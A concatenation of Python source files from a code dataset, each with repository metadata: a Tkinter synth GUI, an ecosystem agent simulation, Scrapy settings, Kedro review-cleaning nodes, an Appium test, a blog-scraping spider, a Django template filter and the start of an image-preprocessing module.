      volume = float(val) / 100\n            self.mixer.music.set_volume(volume)\n        \n        label_vol = tk.Label(mp3_frame, text=\"Volume\", font=('Helvetica', 16))\n        label_vol.grid(row=row, column=0, columnspan=5, sticky='s')\n        row+=1\n        \n        vol_slider = tk.Scale(mp3_frame, from_=0, to=100, orient='horizontal', command= set_volume,\n                              length= 300)\n        vol_slider.set(50)\n        vol_slider.grid(row = row, column=1, columnspan=3)#, pady=10)\n        row+=1\n        \n        ######################################################################################\n        \n        def close_window():\n            pygame.mixer.quit()\n            self.controller.destroy()\n        \n        close_button = tk.Button(self, text=\"Close\", font=('Helvetica', 18),\n                                 command=close_window)\n        close_button.grid(row = row, column=3, columnspan=1, pady=50)\n        row+=1\n        \n    def Play_Song(self):\n        song_path = self.controller.frames['PageSix'].out_synth_path\n        \n        self.mixer.music.load(song_path)\n        self.mixer.music.play(loops=0)\n        \n    def Stop_Song(self):\n        self.mixer.music.stop()\n        \n        self.save_start = 0 #reset the stored resume position\n        \n        \n    def Pause_Song(self):\n        \n        if self.paused:\n            #unpause \n            self.mixer.music.unpause()\n            self.paused = False\n        else:\n            #pause\n            self.mixer.music.pause()\n            self.paused = True\n        \n        \n    def Forward_Song(self):\n        \n        start = self.save_start\n        \n        play_time = self.mixer.music.get_pos()\n\n        start += (play_time/1000.0) + 5\n        \n        self.mixer.music.pause()\n        \n        self.save_start = start\n        #print('Current Time in Song:', start)\n        \n        self.mixer.music.play(loops=0, start = start)\n        \n    def Backward_Song(self):\n        start = self.save_start\n        \n        play_time = self.mixer.music.get_pos()\n\n        start += (play_time/1000.0) - 5\n        \n        self.mixer.music.pause()\n        \n        self.save_start = start\n        #print('Current Time in Song:', start)\n        \n        self.mixer.music.play(loops=0, start = start)\n        \n    def set_volume(self):\n        volume = float(self.vol) / 100\n        self.mixer.music.set_volume(volume)\n        \n\nclass INFO_MOD_LEVEL(tk.Frame):\n\n    def __init__(self, parent, controller):\n        tk.Frame.__init__(self, parent)\n        self.controller = controller\n        \n        label = tk.Label(self, text=\"Mod Level:\", font=controller.title_font)\n        label.pack(side=\"top\", fill=\"x\", pady=10)\n        \n        text = GUI_txt['Mod level']\n        info = tk.Label(self, text=text,\n                        font=('Helvetica', 14), wraplength=500)\n        info.pack(expand=True, padx=20)\n        \n        \n        button = tk.Button(self, text=\"Go Back\", font=('Helvetica', 18),\n                           command=lambda: controller.show_frame(\"PageTwo\"))\n        button.pack(expand=True, padx=20)\n        \nclass 
INFO_MOD_FEEDBACK(tk.Frame):\n\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n \n label = tk.Label(self, text=\"Mod Feedback:\", font=controller.title_font)\n label.pack(side=\"top\", fill=\"x\", pady=10)\n \n text = GUI_txt['Mod Feedback']\n info = tk.Label(self, text=text,\n font=('Helvetica', 14), wraplength=500)\n info.pack(expand=True, padx=20)\n \n \n button = tk.Button(self, text=\"Go Back\", font=('Helvetica', 18),\n command=lambda: controller.show_frame(\"PageTwo\"))\n button.pack(expand=True, padx=20)\n \nclass INFO_SECTION_SIZE(tk.Frame):\n\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n \n label = tk.Label(self, text=\"Section Size:\", font=controller.title_font)\n label.pack(side=\"top\", fill=\"x\", pady=10)\n \n text = GUI_txt['Section Size']\n info = tk.Label(self, text=text,\n font=('Helvetica', 14), wraplength=500)\n info.pack(expand=True, padx=20)\n \n \n button = tk.Button(self, text=\"Go Back\", font=('Helvetica', 18),\n command=lambda: controller.show_frame(\"PageTwo\"))\n button.pack(expand=True, padx=20)\n \nclass INFO_CUSTOMIZE_PARAMETERS(tk.Frame):\n\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n \n label = tk.Label(self, text=\"Customize Parameters:\", font=controller.title_font)\n label.pack(side=\"top\", fill=\"x\", pady=10)\n \n text = GUI_txt['Customize Parameters']\n info = tk.Label(self, text=text,\n font=('Helvetica', 12), wraplength=500)\n info.pack(expand=True, padx=20)\n \n text = GUI_txt['Auto Filter']\n info = tk.Label(self, text=text,\n font=('Helvetica', 12), wraplength=500)\n info.pack(expand=True, padx=20)\n \n text = GUI_txt['Granular']\n info = tk.Label(self, text=text,\n font=('Helvetica', 12), wraplength=500)\n info.pack(expand=True, padx=20)\n \n text = GUI_txt['Interpolator']\n info = tk.Label(self, text=text,\n font=('Helvetica', 12), wraplength=500)\n info.pack(expand=True, padx=20)\n \n \n button = tk.Button(self, text=\"Go Back\", font=('Helvetica', 18),\n command=lambda: controller.show_frame(\"PageSix\"))\n button.pack(expand=True, padx=20)\n \n \n \nclass INFO_CUTOFF(tk.Frame):\n\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n \n label = tk.Label(self, text=\"Minimum and Maximum Cutoff:\",\n font=controller.title_font, wraplength=500)\n label.pack(side=\"top\", fill=\"x\", pady=10)\n \n text = GUI_txt['Cutoff']\n info = tk.Label(self, text=text,\n font=('Helvetica', 14), wraplength=500)\n info.pack(expand=True, padx=20)\n \n \n button = tk.Button(self, text=\"Go Back\", font=('Helvetica', 18),\n command=lambda: controller.show_frame(\"PageSeven\"))\n button.pack(expand=True, padx=20)\n \nclass INFO_LFO(tk.Frame):\n\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n \n label = tk.Label(self, text=\"Minimum and Maximum LFO Frequency:\",\n font=controller.title_font, wraplength=500)\n label.pack(side=\"top\", fill=\"x\", pady=10)\n \n text = GUI_txt['LFO']\n info = tk.Label(self, text=text,\n font=('Helvetica', 14), wraplength=500)\n info.pack(expand=True, padx=20)\n \n \n button = tk.Button(self, text=\"Go Back\", font=('Helvetica', 18),\n command=lambda: controller.show_frame(\"PageSeven\"))\n button.pack(expand=True, padx=20)\n \nclass INFO_LFO_SHAPE_EVO(tk.Frame):\n\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, 
parent)\n self.controller = controller\n \n label = tk.Label(self, text=\"LFO Shape & EVO:\", font=controller.title_font)\n label.pack(side=\"top\", fill=\"x\", pady=10)\n \n text = GUI_txt['LFO SHAPE EVO']\n info = tk.Label(self, text=text,\n font=('Helvetica', 14), wraplength=500)\n info.pack(expand=True, padx=20)\n \n text1 = GUI_txt['SHAPE LEGEND']\n info1 = tk.Label(self, text=text1,\n font=('Helvetica', 12), wraplength=500)\n info1.pack(expand=True, padx=20)\n \n text2 = GUI_txt['EVO LEGEND']\n info2 = tk.Label(self, text=text2,\n font=('Helvetica', 12), wraplength=500)\n info2.pack(expand=True, padx=20)\n \n \n button = tk.Button(self, text=\"Go Back\", font=('Helvetica', 18),\n command=lambda: controller.show_frame(\"PageSeven\"))\n button.pack(expand=True, padx=20)\n \nclass INFO_GRAIN_SIZE(tk.Frame):\n\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n \n label = tk.Label(self, text=\"Grain Size:\", font=controller.title_font)\n label.pack(side=\"top\", fill=\"x\", pady=10)\n \n text = GUI_txt['Grain Size']\n info = tk.Label(self, text=text,\n font=('Helvetica', 14), wraplength=500)\n info.pack(expand=True, padx=20)\n \n \n button = tk.Button(self, text=\"Go Back\", font=('Helvetica', 18),\n command=lambda: controller.show_frame(\"PageEight\"))\n button.pack(expand=True, padx=20)\n \nclass INFO_GRAIN_SPACE(tk.Frame):\n\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n \n label = tk.Label(self, text=\"Grain Space:\", font=controller.title_font)\n label.pack(side=\"top\", fill=\"x\", pady=10)\n \n text = GUI_txt['Grain Space']\n info = tk.Label(self, text=text,\n font=('Helvetica', 14), wraplength=500)\n info.pack(expand=True, padx=20)\n \n \n button = tk.Button(self, text=\"Go Back\", font=('Helvetica', 18),\n command=lambda: controller.show_frame(\"PageEight\"))\n button.pack(expand=True, padx=20)\n \nclass INFO_GRAIN_ORDER(tk.Frame):\n\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n \n label = tk.Label(self, text=\"Grain Order:\", font=controller.title_font)\n label.pack(side=\"top\", fill=\"x\", pady=10)\n \n text = GUI_txt['Grain Order']\n info = tk.Label(self, text=text,\n font=('Helvetica', 14), wraplength=500)\n info.pack(expand=True, padx=20)\n \n \n button = tk.Button(self, text=\"Go Back\", font=('Helvetica', 18),\n command=lambda: controller.show_frame(\"PageEight\"))\n button.pack(expand=True, padx=20)\n \nclass INFO_SMOOTHING(tk.Frame):\n\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n \n label = tk.Label(self, text=\"Smoothing:\", font=controller.title_font)\n label.pack(side=\"top\", fill=\"x\", pady=10)\n \n text = GUI_txt['Smoothing']\n info = tk.Label(self, text=text,\n font=('Helvetica', 14), wraplength=500)\n info.pack(expand=True, padx=20)\n \n \n button = tk.Button(self, text=\"Go Back\", font=('Helvetica', 18),\n command=lambda: controller.show_frame(\"PageEight\"))\n button.pack(expand=True, padx=20)\n \nclass INFO_EVEN_SPACING(tk.Frame):\n\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n \n label = tk.Label(self, text=\"Even Spacing:\", font=controller.title_font)\n label.pack(side=\"top\", fill=\"x\", pady=10)\n \n text = GUI_txt['Even Spacing']\n info = tk.Label(self, text=text,\n font=('Helvetica', 14), wraplength=500)\n info.pack(expand=True, padx=20)\n \n \n 
button = tk.Button(self, text=\"Go Back\", font=('Helvetica', 18),\n command=lambda: controller.show_frame(\"PageEight\"))\n button.pack(expand=True, padx=20)\n \nclass INFO_SIGNAL_SHAPE_EVO(tk.Frame):\n\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n \n label = tk.Label(self, text=\"Wavetable Shape & EVO:\", font=controller.title_font)\n label.pack(side=\"top\", fill=\"x\", pady=10)\n \n text = GUI_txt['SIGNAL SHAPE EVO']\n info = tk.Label(self, text=text,\n font=('Helvetica', 14), wraplength=500)\n info.pack(expand=True, padx=20)\n \n \n button = tk.Button(self, text=\"Go Back\", font=('Helvetica', 18),\n command=lambda: controller.show_frame(\"PageNine\"))\n button.pack(expand=True, padx=20)\n \n\n \ndef get_GUI_TEXT():\n\n GUI_txt = dict()\n \n GUI_txt['Mod level'] = 'Maximum Probability of MIDI Modification Occurrence.\\\n The bigger the value, the more likely Modifications are to occur.'\n \n GUI_txt['Mod Feedback'] = 'Number of times the MIDI pattern gets processed by the MIDI Modification Unit.\\\n A higher number of times will overlay MIDI Mod effects on top of each other.'\n \n GUI_txt['Section Size'] = 'Number of bars of a single \"section\" of the arrangement.\\\n This determines the number of samples used: for each instrument there is one sample per section.'\n \n GUI_txt['Customize Parameters'] = 'There are three Synth modules: Auto-Filter, Granular and Interpolator.\\\n Each Unit is assigned to one Instrument. If you choose the \"Customize Parameters\" option, you can pick which instrument has each Synth Unit, and customize the Synth Parameters. \\\n Otherwise, dubgen will pick the parameters for you and assign each Synth Unit.'\n \n GUI_txt['Auto Filter'] ='Auto-Filter: Applies a Low/High Pass Filter, with a cutoff frequency modulated by an LFO.'\n GUI_txt['Granular'] ='Granular: Divides the signal into small segments (grains), creating new sounds by reordering, spacing out, or \"condensing\" those grains.'\n GUI_txt['Interpolator'] ='Interpolator: Interpolates the input signal with another signal stored in our wavetable.'\n \n \n GUI_txt['Cutoff'] = 'Determines the Maximum and Minimum Cutoff Frequency of the Auto Filter.\\\n The Cutoff Frequency will then oscillate between those two values, modulated by the LFO.'\n \n GUI_txt['LFO'] = 'Determines the Maximum and Minimum LFO Frequency of the Auto Filter. \\\n This will determine the rate at which the Cutoff Frequency oscillates between its Minimum and Maximum Value.'\n \n GUI_txt['LFO SHAPE EVO'] = 'Shape: Shape of the LFO signal. \\\n EVO: Function that determines the evolution of the LFO frequency.'\n \n GUI_txt['SHAPE LEGEND'] = 'SHAPE legend:\\n sawl/sawr: sawtooth wave with left (l) or right (r) \"teeth\".'\n \n GUI_txt['EVO LEGEND'] = 'EVO Legend:\\n linear_up/down: increasing or decreasing linear function;\\n \\\n exp_up/down: Exponential increasing or decreasing function.\\n'\n \n GUI_txt['Grain Size'] = 'Size of each grain.'\n GUI_txt['Grain Space'] ='Space between each grain.'\n GUI_txt['Grain Order'] ='True means the grains maintain original order.\\\n False means the grains are reordered.'\n GUI_txt['Smoothing'] = 'Smoothing Filter smooths the transition between grains.'\n GUI_txt['Even Spacing'] ='True means spaces between grains are all the same.\\\n False means the space between grains varies randomly.'\n \n GUI_txt['SIGNAL SHAPE EVO'] = 'Determines the shape of the wavetable sound that will be interpolated with the input signal. 
EVO determines the evolution of the balance (interpolation weight from 0 to 1) between the two sounds.'\n \n return GUI_txt\n \nif __name__ == \"__main__\":\n \n warnings.filterwarnings(\"ignore\")\n \n GUI_txt = get_GUI_TEXT()\n \n pygame.mixer.quit()\n \n app = App()\n \n app.lift()\n app.attributes('-topmost', True)\n app.after_idle(app.attributes,'-topmost', False)\n \n app.mainloop()\n","repo_name":"JPPaixao/dubgen","sub_path":"Program/dubgen.py","file_name":"dubgen.py","file_ext":"py","file_size_in_byte":83458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2016670694","text":"import random\n\nimport pygame.time\nfrom pygame import Vector2\nimport itertools\n\nimport core\nfrom body import Body\nfrom vegetal import Vegetal\n\n\nclass Agent(object):\n def __init__(self, statut, position, vmin, vmax, accmin, accmax, faim_min, faim_max, fatigue_min, fatigue_max,\n reproduction_min, reproduction_max, endormi_min, endormi_max, esperance_min, esperance_max):\n self.body = Body(self, statut, position, vmin, vmax, accmin, accmax, faim_min, faim_max, fatigue_min,\n fatigue_max, reproduction_min, reproduction_max, endormi_min, endormi_max, esperance_min,\n esperance_max)\n self.uuid = random.randint(100000, 999999999)\n\n def filtrePerception(self):\n carnivore = []\n super_predateur = []\n herbivore = []\n decompositeur = []\n vegetal = []\n for i in self.body.fustrum.perceptionList:\n i.dist = self.body.position.distance_to(i.position)\n if isinstance(i, Vegetal):\n vegetal.append(i)\n if isinstance(i, Body):\n if i.statut == \"CARNIVORE\":\n carnivore.append(i)\n elif i.statut == \"HERBIVORE\":\n herbivore.append(i)\n elif i.statut == \"SUPER_PREDATEUR\":\n super_predateur.append(i)\n elif i.statut == \"DECOMPOSITEUR\":\n decompositeur.append(i)\n\n carnivore.sort(key=lambda x: x.dist, reverse=False)\n herbivore.sort(key=lambda x: x.dist, reverse=False)\n super_predateur.sort(key=lambda x: x.dist, reverse=False)\n decompositeur.sort(key=lambda x: x.dist, reverse=False)\n vegetal.sort(key=lambda x: x.dist, reverse=False)\n\n return carnivore, super_predateur, herbivore, decompositeur, vegetal\n\n def faireUnEnfant(self, a, b, c, d, e, f, g, h, i, j, k, l, m, n, o, p):\n core.memory('agents').append(Agent(a,\n b\n , c\n , d\n , e\n , f\n , g\n , h\n , i\n , j,\n k,\n l,\n m,\n n,\n o\n , p))\n\n def computeForce(self, preys, predators, friend):\n fuite = self.fuite(predators) * 2\n hunt = self.hunt(preys) * 1\n symbiose = self.symbiose(friend) * 2\n\n if fuite + hunt + symbiose == (0,0):\n self.body.acc += Vector2(random.randint(-5,5), random.randint(-5,5))\n else: self.body.acc = self.body.acc + hunt + fuite + symbiose\n\n def fuite(self, predators):\n steering = Vector2()\n if len(predators) > 0:\n prey = sorted(predators, key=lambda x: x.position.distance_to(self.body.position), reverse=True)[0]\n steering = prey.position + self.body.position\n return steering\n\n def symbiose(self, friends):\n steering = Vector2()\n if len(friends) > 0:\n prey = sorted(friends, key=lambda x: x.position.distance_to(self.body.position), reverse=True)[0]\n steering = prey.position - self.body.position\n return steering\n\n def hunt(self, preys):\n steering = Vector2()\n if len(preys) > 0:\n prey = sorted(preys, key=lambda x: x.position.distance_to(self.body.position), reverse=True)[0]\n steering = prey.position - self.body.position\n return steering\n\n def eat(self,preys):\n for p in preys:\n if p.position.distance_to(self.body.position) < 15:\n 
p.vivant = False\n if p.statut == \"CARNIVORE\":\n self.body.timer_faim = pygame.time.get_ticks() # Eating a carnivore refills the whole hunger gauge\n if p.statut == \"HERBIVORE\":\n self.body.timer_faim -= 10000 # Gain 10 seconds by eating a herbivore\n if p.statut == \"DECOMPOSITEUR\":\n self.body.timer_faim -= 3000 # Gain 3 seconds by eating a decompositeur\n if p.statut == \"VEGETAL\":\n self.body.timer_faim -= 1000 # Gain 1 second by eating a vegetal\n p.statut = \"DEAD\" # mark as eaten only after the bonus checks above\n\n def update(self):\n\n carnivore, super_predateur, herbivore, decompositeur, vegetal = self.filtrePerception()\n\n if self.body.vivant:\n if self.body.endormi:\n self.body.vitesse = Vector2()\n elif self.body.statut == \"SUPER_PREDATEUR\":\n self.eat(list(itertools.chain(carnivore, decompositeur, vegetal)))\n self.computeForce(list(itertools.chain(carnivore, decompositeur, vegetal)), [], [])\n elif self.body.statut == \"CARNIVORE\":\n self.eat(list(itertools.chain(herbivore, decompositeur, vegetal)))\n self.computeForce(list(itertools.chain(herbivore, decompositeur, vegetal)), super_predateur, [])\n elif self.body.statut == \"HERBIVORE\":\n self.eat(list(itertools.chain(vegetal, decompositeur)))\n self.computeForce(list(itertools.chain(vegetal, decompositeur)), carnivore, super_predateur)\n elif self.body.statut == \"DECOMPOSITEUR\":\n self.eat(vegetal)\n self.computeForce(vegetal, list(itertools.chain(super_predateur, carnivore, herbivore)), [])\n else:\n self.body.vitesse = Vector2()\n\n def show(self):\n self.body.show()\n","repo_name":"0domart/tp_interaction","sub_path":"agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":5904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}{"seq_id":"41178088814","text":"# -*- coding: utf-8 -*-\n\nBOT_NAME = 'firsttest'\nSPIDER_MODULES = ['firsttest.spiders']\nNEWSPIDER_MODULE = 'firsttest.spiders'\n\nROBOTSTXT_OBEY = False\n\nCONCURRENT_REQUESTS = 32\n\nDOWNLOAD_DELAY = 3\n# CONCURRENT_REQUESTS_PER_DOMAIN = 16\n# CONCURRENT_REQUESTS_PER_IP = 16\n\nCOOKIES_ENABLED = False\n\n#DEFAULT_REQUEST_HEADERS = {\n# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n# 'Accept-Language': 'en',\n#}\n\nDOWNLOADER_MIDDLEWARES = {\n 'scrapy.downloadermiddlewares.useragent.UserAgentMiddleware':None,\n 'firsttest.middlewares.RotateUserAgentMiddleware':50,\n}\n\nITEM_PIPELINES = {\n # 'firsttest.pipelines.FirsttestPipeline': 300,\n # 'firsttest.pipelines.MyImagesPipeline': 400,\n 'firsttest.pipelines.DoubanmoviePipeline':600,\n # 'firsttest.pipelines.MongoDBPipeline':900,\n}\n\nAUTOTHROTTLE_MAX_DELAY = 60\n\nHTTPCACHE_ENABLED = True\nHTTPCACHE_EXPIRATION_SECS = 0\nHTTPCACHE_DIR = 'httpcache'\nHTTPCACHE_IGNORE_HTTP_CODES = []\nHTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'\n\n# CRITICAL, ERROR, WARNING, INFO, DEBUG\nLOG_LEVEL = 'INFO'\n\nIMAGES_STORE='C:\新建文件夹'\n# IMAGES_EXPIRES = 90 # expiry in days; images fetched within the last 90 days are not re-fetched\n# IMAGES_MIN_HEIGHT = 110 # filter out images below this size\n# IMAGES_MIN_WIDTH = 110\n\nMYSQL_HOST = '127.0.0.1'\nMYSQL_PORT = 3306\nMYSQL_DBNAME = 'world'\nMYSQL_USER = 'dhz'\nMYSQL_PASSWD = '666'\nMYSQL_CHARSET = 'utf8' # the charset must be set, otherwise Chinese text may come out garbled\n\nMONGODB_SERVER = 'localhost'\nMONGODB_PORT = 27017\nMONGODB_DB = 'yun'\nMONGODB_COLLECTION = 
'coll'","repo_name":"chinesehuazhou/ScrapyProject","sub_path":"firsttest/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"72"} +{"seq_id":"4090800581","text":"\"\"\"\nThis script contains nodes containing functions for pipeline\n\"\"\"\nimport yaml\nfrom typing import Any, Callable, Dict, Tuple\nimport datasets\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\n\n\n#with open('conf/base/parameters.yml', 'r') as f:\n# params = yaml.safe_load(f)['parameters']\n\n\ndef download_reviews(parameters: Dict[str, Any]):\n \"\"\"\n Load the reviews dataset from the datasets library. \n and save in a csv file in data folder\n \n Args:\n parameters: parameters from parameters.yml file\n \n Returns:\n reviews: B2W reviews dataset from huggingface datasets library\n \"\"\" \n\n # load the dataset\n dataset = datasets.load_dataset(parameters['name'])\n return dataset[parameters['split']].to_pandas()\n\n\ndef drop_null_values(dataframe: pd.DataFrame, parameters: list) -> pd.DataFrame:\n \"\"\"\n Drop null values from the dataframe\n \n Args:\n dataframe: dataframe to be cleaned\n parameters: parameters from parameters.yml file\n \n Returns:\n dataframe: cleaned dataframe\n \"\"\"\n print(f\"Input data columns: {dataframe.columns}\")\n print(f\"Columns to drop nulls from: {parameters['columns']}\")\n cleaned_data = dataframe.dropna(subset=parameters['columns'])\n return cleaned_data\n\n\ndef clean_review(dataframe: pd.DataFrame, parameters: Dict[str, Any]) -> pd.DataFrame:\n \"\"\"Node for cleaning reviews text\n Args:\n dataframe: A pandas dataframe.\n parameters: A dictionary of parameters.\n Returns:,\n pd.DataFrame: The data from the node.\n \"\"\"\n dataframe[parameters['sentimentcolumn']] = [\n 'positivo' if x >= 4 else 'negativo' for x in dataframe[parameters['ratingcolumn']]\n ]\n dataframe[parameters['textcolumn']] = dataframe[parameters['textcolumn']].str.lower()\n dataframe[parameters['textcolumn']] = dataframe[parameters['textcolumn']].str.replace(r'[^\\w\\s]+', '')\n dataframe[parameters['textcolumn']] = dataframe[parameters['textcolumn']].str.replace(r'\\n', ' ') \n reviews = dataframe.dropna(subset=[parameters['textcolumn']])\n return reviews","repo_name":"bobcastaldeli/b2w_reviews","sub_path":"src/b2w_reviews/pipelines/data_engineering/nodes.py","file_name":"nodes.py","file_ext":"py","file_size_in_byte":2118,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"20043447549","text":"# urs/bin/python\r\n# encoding:utf-8\r\nimport time\r\nimport os,sys\r\nimport unittest\r\nfrom psam.psam import Psam\r\nfrom base.baseConversion import BaseConversion as bc\r\nsys.path.append(r'D:\\workspace\\workspace_python3\\appium_python\\src')\r\n\r\n\r\nfrom base.baseAdb import BaseAdb\r\n\r\n\r\nclass MyTestCase(unittest.TestCase):\r\n #脚本初始化,获取操作实例\r\n def setUp(self):\r\n BaseAdb.adbIntallUiautmator() \r\n self.driver = Psam()\r\n\r\n #释放实例,释放资源\r\n def tearDown(self): \r\n self.driver.quit()\r\n \r\n def testCase(self):\r\n time.sleep(5)\r\n BaseAdb.adbHome()\r\n time.sleep(2)\r\n print(\"测试\")\r\n self.driver.click(\"name=>设置\")\r\n self.scroll(\"name=>单手操作\")\r\n \r\n def scroll(self, txt):\r\n w = self.driver.get_window_size()['width']\r\n h = self.driver.get_window_size()['height']\r\n \r\n while True:\r\n \r\n el = self.driver.element_wait(txt, 2)\r\n if el != None:\r\n y = 
el.location['y']\r\n if bc.round(float(y/h), 2) > 0.8 :\r\n self.driver.swipe(w/2, y*0.8, w/2, y*0.5, 1000)\r\n break\r\n \r\n else:\r\n \r\n self.driver.swipeUp()\r\n \r\n \r\nif __name__ == '__main__':\r\n suite = unittest.TestSuite()\r\n suite.addTest(MyTestCase('testCase'))\r\n runner = unittest.TextTestRunner(verbosity=2)\r\n runner.run(suite)\r\n\r\n\r\n","repo_name":"hi-cbh/pytest","sub_path":"src/testcode/tmp.py","file_name":"tmp.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}{"seq_id":"626831087","text":"# -*- coding: utf-8 -*-\nfrom gevent.pool import Pool\nfrom db import mondb\nimport gevent\nimport requests\nimport logging\nimport lxml.html\nimport time\ntry:\n import ujson as json\nexcept ImportError:\n import json\n\nimport re\n\nlogger = logging.getLogger(__name__)\nnow_date = lambda: time.strftime(\"%Y-%m-%d %X\")\n\n\nclass BlogSpider(gevent.Greenlet):\n \n _headers = {}\n \n def __init__(self, **options):\n '''Initialize the configuration\n : required options: src, url, pool_size => _src, _url, _pool_size\n @param url: eg: 'http://www.oschina.net/search?q=python&scope=blog&sort_by_time=1&p=%s'\n '''\n names = ['src', 'url', 'pool_size']\n [setattr(self, '_%s' % name, options[name]) for name in names] \n \n self._max_page = options.get('max_page') or 50\n self._headers.update(options.get('headers', {}))\n self._pool = Pool(size=self._pool_size)\n self._handle = None\n \n gevent.Greenlet.__init__(self)\n \n def exist(self, link):\n '''Check whether this blog already exists in the database, based on its original link\n @param link: original link\n '''\n return mondb.blog.find_one({'link':link}, {'_id':1}) is not None\n \n def page_n(self, n):\n url = self._url % (n,)\n try:\n r = requests.get(url, headers=self._headers, timeout=20)\n except:\n logger.warn('%s parse except', url, exc_info=1)\n return\n \n if r.status_code in [200, ]:\n return r\n \n def oschina_parse_page(self, r):\n '''Parse an oschina page\n '''\n assert r.encoding.upper() == 'UTF-8'\n \n try:\n html = lxml.html.fromstring(r.text) # r.content\n ul = html.xpath('//*[@id=\"results\"]')[0]\n except:\n logger.warn('ul xpath parse except', exc_info=1)\n raise StopIteration\n \n for li in ul:\n try:\n link = li.find('h3/a').attrib['href']\n title = li.find('h3/a').text_content()\n summary = li.find('p[2]').text_content()\n date = li.find('p[3]').text_content().split()[0]\n author = li.find('p[3]/a').text_content()\n except:\n logger.warn('li xpath parse except', exc_info=1)\n raise StopIteration\n \n if self.exist(link):\n raise StopIteration\n \n yield (title, link, date, author, summary)\n \n def csdn_parse_page(self, r):\n '''Parse a csdn page\n '''\n assert r.encoding.upper() == 'UTF-8'\n \n try:\n html = lxml.html.fromstring(r.text) # using r.content here would produce garbled text\n try:\n raw = html.xpath('//script[13]/text()')[0] # does not work with old lxml versions\n except:\n logger.warn('need latest lxml')\n raw = html.xpath('//script')[12].text\n data = re.findall(r'\\r\\nvar data = (.+);\\r\\n', raw)[0]\n data = json.loads(data)\n except:\n logger.warn('raw xpath parse except', exc_info=1)\n raise StopIteration\n \n ul = data['result']\n for li in ul:\n try:\n link = li['url']\n title = li['title']\n summary = ''\n date = time.strftime(\"%Y-%m-%d\",\n time.localtime(time.mktime(time.strptime(li['created_at'], '%Y%m%d%H')))\n )\n author = li['user_name']\n except:\n logger.warn('li dict data except', exc_info=1)\n raise StopIteration\n \n if self.exist(link):\n raise StopIteration\n \n yield (title, link, date, author, summary)\n \n def save(self, title, link, date, author, 
summary):\n blog = {'src':self._src,\n 'title':title,\n 'link':link,\n 'date':date,\n 'author':author,\n 'summary':summary,\n 'spider_date':now_date()\n }\n mondb.blog.insert(blog)\n \n def parse(self, i):\n r = self.page_n(i)\n if not r: return\n for title, link, date, author, summary in self._handle(r):\n logger.info('insert to %s mongo title: %s', self._src, repr(title))\n self.save(title, link, date, author, summary)\n \n def crawling(self):\n self._handle = getattr(self, '%s_parse_page' % self._src, None)\n assert self._handle is not None\n \n self._pool.map(self.parse, xrange(1, self._max_page + 1))\n \n def _run(self):\n self.crawling()\n","repo_name":"gf0842wf/spider-blog","sub_path":"spider/spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":4752,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"}{"seq_id":"30994077002","text":"from django import template\nfrom django.utils.html import format_html\nregister = template.Library()\n\n@register.filter\ndef as_icon(value):\n icons = {True: \"ok\",\n False: \"remove\",\n None: \"asterisk\"\n }\n if not value in icons:\n raise ValueError(value, 'is not a boolean or empty value!')\n else:\n # render the matching Bootstrap glyphicon for the value\n return format_html('<span class=\"glyphicon glyphicon-{}\"></span>', icons[value])\n","repo_name":"artus40/maraudes_project","sub_path":"website/templatetags/boolean_icons.py","file_name":"boolean_icons.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}{"seq_id":"1822990703","text":"\"\"\"\nfunctions for deterministically preprocessing images mostly for the\nconsumption of computer vision algorithms\n\"\"\"\n\nfrom __future__ import division, absolute_import\nfrom __future__ import print_function, unicode_literals\n\n\nimport math\nimport numpy as np\nfrom scipy import ndimage\nimport PIL\n\nfrom .. import numpy_utils\n\n\ndef get_block_with_corner_and_shape(data, corner, shape, fill_value=0):\n \"\"\"\n takes the block with the given top corner and shape from the input data\n if the input data block is too small, pad it with the provided fill value\n \"\"\"\n assert isinstance(shape, tuple), shape\n assert len(shape) == len(data.shape), {\n \"shape\": shape,\n \"data.shape\": data.shape,\n }\n\n maxed_corner = [max(0, c) for c in corner]\n slices = [slice(mc, c + size)\n for c, mc, size in zip(corner, maxed_corner, shape)]\n # index with tuple allows slice to work with hdf5 dataset\n sliced = data[tuple(slices)]\n if sliced.shape == shape:\n res = sliced\n else:\n res = numpy_utils.constant_value_array(fill_value, shape, data.dtype)\n inner_slices = [\n slice(mc - c, mc - c + s)\n for c, mc, s in zip(corner, maxed_corner, sliced.shape)\n ]\n res[tuple(inner_slices)] = sliced\n assert res.shape == shape, dict(\n res_shape=res.shape,\n desired_shape=shape,\n sliced_shape=sliced.shape,\n slices=slices\n )\n return res\n\n\ndef get_block_with_center_and_shape(data, center, shape, fill_value=0):\n \"\"\"\n takes the block with a given shape from the input data block at the\n given center. 
